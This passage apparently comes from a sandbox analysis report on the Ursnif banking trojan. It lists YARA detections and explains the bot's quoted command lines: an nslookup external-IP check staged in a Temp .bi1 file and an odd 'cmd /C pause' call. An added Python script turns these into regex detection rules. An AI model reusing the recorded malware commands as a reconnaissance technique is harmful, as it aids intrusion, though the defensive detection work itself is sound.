                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000031.00000002.1074072106.00000000010F8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000031.00000003.1072599923.00000000010F8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000031.00000003.1072653572.00000000010F8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000031.00000003.1072532170.00000000010F8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000031.00000003.1072835287.00000000010F8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000031.00000003.1072860777.00000000010F8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000031.00000003.1072702315.00000000010F8000.00000004.00000040.sdmp, Author: Joe Security

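The two `cmd /C` invocations above (the `nslookup myip.opendns.com resolver1.opendns.com > ...\Temp\380E.bi1` lookup followed by `echo -------- >> ...\Temp\380E.bi1`) are the bot's external-IP check: querying `myip.opendns.com` against an OpenDNS resolver returns the public address the resolver sees, and the result is staged in a short-named `.bi1` scratch file under the user's Temp directory. The later `cmd.exe /C pause dll mail, ,` is equally distinctive, since `pause` takes no arguments and a non-interactive parent has no console to pause. The following detection logic is an added example and is not part of the Joe Sandbox report or of Joe Security's own tooling; the process-creation events it scans are constructed, modelled on the command lines recorded above plus one benign `nslookup` for contrast, and the rule names and the event field layout are assumptions made for illustration.

```python
import re
from typing import Dict, List

# Constructed sample process-creation events (hypothetical log records) modelled on the
# command lines in the report above; pid values and field names are assumed for the example.
SAMPLE_EVENTS = [
    {"pid": 101, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\380E.bi1"'},
    {"pid": 102, "image": r"C:\Windows\System32\nslookup.exe",
     "cmdline": "nslookup myip.opendns.com resolver1.opendns.com"},
    {"pid": 103, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\380E.bi1"'},
    {"pid": 104, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,'},
    # Benign lookup that must not trigger any rule.
    {"pid": 105, "image": r"C:\Windows\System32\nslookup.exe",
     "cmdline": "nslookup www.example.com"},
]

# Each rule is (assumed rule name, regex applied to the full command line).
RULES = [
    # myip.opendns.com answered by an OpenDNS resolver returns the querying host's public IP.
    ("external_ip_discovery_opendns",
     re.compile(r"\bnslookup\b.*\bmyip\.opendns\.com\b", re.IGNORECASE)),
    # Output redirected (> or >>) into a short hex-named .bi1 file under the user's Temp
    # directory, the scratch file used by both cmd invocations in the report.
    ("temp_bi1_redirect",
     re.compile(r">{1,2}\s*\S*\\AppData\\Local\\Temp\\[0-9A-F]{1,4}\.bi1\b", re.IGNORECASE)),
    # cmd /C pause followed by further tokens: pause accepts no arguments, so anything after
    # it is a marker rather than input, and a non-interactive parent has no console to pause.
    ("cmd_pause_with_args",
     re.compile(r"""\bcmd(?:\.exe)?["']?\s+/C\s+pause\s+\S""", re.IGNORECASE)),
]

# Extracts the .bi1 scratch path so the lookup and the separator write can be tied together.
BI1_PATH = re.compile(r"\S*\\AppData\\Local\\Temp\\[0-9A-F]{1,4}\.bi1", re.IGNORECASE)


def classify(event: Dict[str, object]) -> List[str]:
    """Return the names of every rule whose regex matches this event's command line."""
    cmdline = str(event["cmdline"])
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan(events: List[Dict[str, object]]) -> Dict[int, List[str]]:
    """Run all rules over all events; map pid -> matched rule names, omitting clean events."""
    return {int(e["pid"]): hits for e in events if (hits := classify(e))}


def correlate_scratch_files(events: List[Dict[str, object]]) -> Dict[str, List[int]]:
    """Group pids by the Temp .bi1 file they redirect into.

    A file that receives both the nslookup output and the '--------' separator is the
    complete IP-probe sequence seen in the report, which is a stronger signal than
    either command line on its own.
    """
    by_file: Dict[str, List[int]] = {}
    for e in events:
        m = BI1_PATH.search(str(e["cmdline"]))
        if m:
            by_file.setdefault(m.group(0).lower(), []).append(int(e["pid"]))
    return by_file


if __name__ == "__main__":
    for pid, hits in scan(SAMPLE_EVENTS).items():
        print(f"pid {pid}: {', '.join(hits)}")
    for path, pids in correlate_scratch_files(SAMPLE_EVENTS).items():
        print(f"scratch file {path} written by pids {pids}")
```

The single-line rules are cheap and fit directly into a SIEM query, but on their own the `nslookup myip.opendns.com` pattern will also fire on administrators checking their egress address; correlating the lookup with a separator write into the same Temp scratch file, as `correlate_scratch_files` does, is what separates this Ursnif behaviour from that background noise.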
                                                          Disassembly

                                                          Code Analysis
